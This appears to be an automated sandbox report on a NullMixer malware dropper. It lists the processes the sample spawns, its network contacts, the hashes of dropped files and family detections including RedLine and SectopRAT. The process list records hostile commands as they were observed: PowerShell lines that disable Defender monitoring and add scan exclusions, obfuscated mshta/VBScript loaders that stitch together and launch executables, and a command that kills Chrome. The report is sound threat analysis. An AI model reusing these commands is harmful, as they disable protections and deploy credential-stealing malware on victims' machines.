Tue19411ac950924ec3f.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe

Tue19325eb008c0b950.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe

Tue1993b3f72c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe

Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe

Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe

Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe

Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe

Tue19b4ef3b53293fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe

Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe

Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe

Tue192762f1cd058ddf8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe

Tue193858933525b62.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe

Tue19879c4c0e.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe

Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe

Tue19c06f159e0ec.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe"

C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp" /SL5="$8019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp" /SL5="$9019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 488

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue193858933525b62.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 sayanu.xyz udp
N/A 127.0.0.1:49279 tcp
N/A 127.0.0.1:49281 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegka.top udp
US 104.155.138.21:80 telegka.top tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:2151 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
US 72.84.118.132:8080 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
NL 45.9.20.13:80 tcp
US 107.178.223.183:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 06c46fe375c6748c533c881346b684d1
SHA1 cb488c5b5f58f3adaf360b0721e145f59c110b57
SHA256 07cf30eb7de3a5626ce499d5efdeba147c3c5bd40686cfc8727b4da7f9ab7d1a
SHA512 bdf582b78bc5ef135260f7c93119ef315cc08836d9864014951bc6fe919e33ca3184828c70e6ab43b70730bd191a511112a088968abf03bbe4a5e17cb4276443

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe

MD5 ba794724c566766d57e2aee175cde54a
SHA1 401fb41eaf42791c66738f460009ba00f7cdd913
SHA256 9a6c446576e8005dae5b5fb4df7876dea6f09501156e9a5220b60d77b41566d6
SHA512 590777c06b912054ef8722c8195521e1c74bf3f31f7c3b8e9e2b7a14352f25ed0ada8e6751916017bd506af03eb0afea0ca759872a8ff17d5837836fdaf6e774

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2744-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2744-82-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2744-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2744-88-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2744-87-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2744-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2744-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2744-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2744-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2744-81-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2744-80-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe

MD5 83552f70e7791687013e0b6e77eef7f4
SHA1 ae6e0e3f2873dd234b4813d4c6a47364111dec8a
SHA256 72e3a9de1b4e4d7f3fc08a1e3071bfa7da14a79eb23fe54f47d6e4c38b3a5c84
SHA512 969b5a9128c5ffff270e0019b5e1bc7b5cd250bf367e7c022aceac0e1496eedf50c657a52083416999ebf59a4eb57827306924febebae1ee9a833a6ad1b5b5c9

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/1436-132-0x0000000000910000-0x0000000000918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

memory/1556-165-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6V5UUU7WNQG6VILYJXP7.temp

MD5 d4c7a2d0382dfe7fb6c61673ddeef4b2
SHA1 8cb66d10121b3d55d4133de3260b11eae33d8756
SHA256 57404e06d681c79786d4904f34a4d8f7c1f771e3e68719686fa0a61d96fbb4fb
SHA512 23481a22eb082011906c1a574bee153fd3b32fd046af268d91431494e6d022b2400da4a55288f6e667cdba94c471614f38d360c1aab8f15f8a656607c2d8f926

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2744-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/1556-191-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1468-190-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2528-192-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-CH67V.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-CH67V.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2856-204-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/2312-208-0x0000000000CB0000-0x0000000000D20000-memory.dmp

memory/1936-206-0x0000000001280000-0x00000000012F2000-memory.dmp

memory/1612-205-0x0000000000E30000-0x0000000000EA0000-memory.dmp

memory/2720-207-0x0000000000E70000-0x0000000000E88000-memory.dmp

memory/2720-210-0x0000000000430000-0x0000000000436000-memory.dmp

memory/2008-225-0x0000000002550000-0x0000000002740000-memory.dmp

memory/2744-226-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2744-231-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2744-230-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2744-229-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2744-228-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2744-227-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3056-244-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3056-242-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3056-241-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3056-240-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3056-238-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3056-236-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3056-234-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3056-232-0x0000000000400000-0x0000000000422000-memory.dmp

memory/496-269-0x0000000000400000-0x0000000000422000-memory.dmp

memory/496-268-0x0000000000400000-0x0000000000422000-memory.dmp

memory/496-267-0x0000000000400000-0x0000000000422000-memory.dmp

memory/496-266-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/496-264-0x0000000000400000-0x0000000000422000-memory.dmp

memory/496-262-0x0000000000400000-0x0000000000422000-memory.dmp

memory/496-260-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3068-257-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3068-255-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3068-254-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3068-253-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3068-251-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3068-249-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3068-247-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1744-283-0x0000000000400000-0x0000000002F29000-memory.dmp

memory/2744-291-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2744-290-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2744-285-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2744-284-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2744-292-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab6307.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:28

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
